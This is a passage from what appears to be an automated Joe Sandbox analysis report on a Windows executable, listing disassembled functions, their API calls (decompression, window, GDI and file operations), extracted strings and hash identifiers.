                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                            • String ID: lI$GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                            • API String ID: 2573145106-911929905
                                                                                            • Opcode ID: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
                                                                                            • Instruction ID: 5860e754879763acac88ff1443aad6da1c0af202f9247d34d09c584a8b2c0160
                                                                                            • Opcode Fuzzy Hash: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
                                                                                            • Instruction Fuzzy Hash: 7501A234608204AFDF20EB999D42E1A73E8EB4A714F2041F7F810D73D2DA7C9D04D658
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(03100000,BZ2_bzDecompressInit), ref: 0045CDB1
                                                                                            • GetProcAddress.KERNEL32(03100000,BZ2_bzDecompress), ref: 0045CDC1
                                                                                            • GetProcAddress.KERNEL32(03100000,BZ2_bzDecompressEnd), ref: 0045CDD1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                            • API String ID: 190572456-212574377
                                                                                            • Opcode ID: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
                                                                                            • Instruction ID: 1838bd6a3fc69983aea635b8e0361122e28d55063b6a1ad71f1ff2e1482e7c5d
                                                                                            • Opcode Fuzzy Hash: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
                                                                                            • Instruction Fuzzy Hash: 86F0A9B05007009FDB24DB26BEC67272AA7E7A4746F14843BD819A6263F77C045DCA5C
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,0047F8E7), ref: 0042E8A9
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E8AF
                                                                                            • InterlockedExchange.KERNEL32(0049A668,00000001), ref: 0042E8C0
                                                                                              • Part of subcall function 0042E820: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
                                                                                              • Part of subcall function 0042E820: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
                                                                                              • Part of subcall function 0042E820: InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
                                                                                            • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E8D4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                            • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                            • API String ID: 142928637-2676053874
                                                                                            • Opcode ID: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
                                                                                            • Instruction ID: c365c5bc722f159dc4e6bf90002f67a18111edd1cc3b7a2fef3254202be3c5aa
                                                                                            • Opcode Fuzzy Hash: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
                                                                                            • Instruction Fuzzy Hash: 02E092A1341720AAEB1077B77C8AF9A2258CB11729F5C4037F180A61D2C6BD0C90CE9E
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
                                                                                            • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
                                                                                            • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                            • API String ID: 667068680-222143506
                                                                                            • Opcode ID: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
                                                                                            • Instruction ID: cfeeddb06e0de6ce6ebab5647243e6050a865ade16457065002c887e192085cf
                                                                                            • Opcode Fuzzy Hash: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
                                                                                            • Instruction Fuzzy Hash: 1BC012E0245700EDDA00B7F12CC3D772558D550F24750843B705879183D77C1C008F2C
                                                                                            APIs
                                                                                            • GetFocus.USER32 ref: 0041B755
                                                                                            • 73A0A570.USER32(?), ref: 0041B761
                                                                                            • 73A08830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                                                            • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                                                            • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                                                            • 73A08830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A08830$A022A16310A570Focus
                                                                                            • String ID:
                                                                                            • API String ID: 3731147114-0
                                                                                            • Opcode ID: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                                            • Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
                                                                                            • Opcode Fuzzy Hash: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                                            • Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
                                                                                            APIs
                                                                                            • GetFocus.USER32 ref: 0041BA27
                                                                                            • 73A0A570.USER32(?), ref: 0041BA33
                                                                                            • 73A08830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
                                                                                            • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
                                                                                            • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
                                                                                            • 73A08830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A08830$A022A16310A570Focus
                                                                                            • String ID:
                                                                                            • API String ID: 3731147114-0
                                                                                            • Opcode ID: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                                            • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                                                            • Opcode Fuzzy Hash: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                                            • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                                                            APIs
                                                                                            • GetFocus.USER32 ref: 0041B58E
                                                                                            • 73A0A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                                                            • 73A14620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                                                            • 73A3E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                                                            • 73A3E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                                                            • 73A0A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: E680$A14620A480A570Focus
                                                                                            • String ID:
                                                                                            • API String ID: 932946509-0
                                                                                            • Opcode ID: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                                            • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                                                            • Opcode Fuzzy Hash: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                                            • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                                                            APIs
                                                                                            • SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
                                                                                            • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045C8A4,?,00000000,0045C838,?,?,?,?,00000000), ref: 0045C816
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                            • API String ID: 1452528299-1580325520
                                                                                            • Opcode ID: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
                                                                                            • Instruction ID: f1a5a0da2dcc97a3faf8a15e8aeeb0a96b83315a605ea6bcd06888aa97a57620
                                                                                            • Opcode Fuzzy Hash: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
                                                                                            • Instruction Fuzzy Hash: 3111D835200305BFD711EAA1C9C1A9ABAACDB48707F6040776D0092783D73C9F0AD96D
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                                                            • 73A0A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
                                                                                            • 73A14620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
                                                                                            • 73A14620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
                                                                                            • 73A0A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A14620MetricsSystem$A480A570
                                                                                            • String ID:
                                                                                            • API String ID: 1130675633-0
                                                                                            • Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                            • Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
                                                                                            • Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                            • Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,00401B68), ref: 00401ABD
                                                                                            • LocalFree.KERNEL32(006A29F0,00000000,00401B68), ref: 00401ACF
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,006A29F0,00000000,00401B68), ref: 00401AEE
                                                                                            • LocalFree.KERNEL32(006A0DB8,?,00000000,00008000,006A29F0,00000000,00401B68), ref: 00401B2D
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B58
                                                                                            • RtlDeleteCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B62
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 3782394904-0
                                                                                            • Opcode ID: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                                            • Instruction ID: 4ef907ce7de5879ae286245a644ba6b68361dc01c28fd2a698a6758b772d8c96
                                                                                            • Opcode Fuzzy Hash: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                                            • Instruction Fuzzy Hash: C9114270A403405AEB15AB659C89B263BE597A570CF54407BF80067AF2D7BC5860C7EF
                                                                                            APIs
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047CC9E
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046BD7C), ref: 0047CCC4
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047CCD4
                                                                                            • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047CCF5
                                                                                            • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047CD09
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047CD25
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Long$Show
                                                                                            • String ID:
                                                                                            • API String ID: 3609083571-0
                                                                                            • Opcode ID: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
                                                                                            • Instruction ID: b9d10cbe0955a365ec79174b91f205d0e2d6322d15c7b647bae3529478a090fa
                                                                                            • Opcode Fuzzy Hash: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
                                                                                            • Instruction Fuzzy Hash: 9A010CB5651210ABD710D7A8CD81F663798AB1D334F09067AB999DF2E2C629DC108B49
                                                                                            APIs
                                                                                              • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
                                                                                            • UnrealizeObject.GDI32(00000000), ref: 0041B28C
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B29E
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2C1
                                                                                            • SetBkMode.GDI32(?,00000002), ref: 0041B2CC
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2E7
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 0041B2F2
                                                                                              • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                            • String ID:
                                                                                            • API String ID: 3527656728-0
                                                                                            • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                            • Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
                                                                                            • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                            • Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateFileHandle
                                                                                            • String ID: $pI$.tmp$}RI
                                                                                            • API String ID: 3498533004-1860564545
                                                                                            • Opcode ID: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
                                                                                            • Instruction ID: 59b3140617fbadefd4c9ffb48c61b81df6a531bfad3e19e72d5fef91abd571f9
                                                                                            • Opcode Fuzzy Hash: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
                                                                                            • Instruction Fuzzy Hash: 0031A770A00219ABCB11EF95D942B9FBBB5AF45715F60412BF800B73C2D6785F0587AD
                                                                                            APIs
                                                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                            • ShowWindow.USER32(?,00000005,00000000,00496485,?,?,00000000), ref: 00496256
                                                                                              • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                              • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
                                                                                              • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                            • String ID: .dat$.msg$IMsg$Uninstall
                                                                                            • API String ID: 3312786188-1660910688
                                                                                            • Opcode ID: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
                                                                                            • Instruction ID: 58d6af22fd8ad1ff54f71e35ba593e4f31a3bf997598853b00730072561c9efa
                                                                                            • Opcode Fuzzy Hash: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
                                                                                            • Instruction Fuzzy Hash: C4319234A006149FCB00FFA5DD5295E7BB5FB48708F51847AF800A73A2CB78AD049B9C
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 00496744
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 0049676D
                                                                                            • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00496786
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
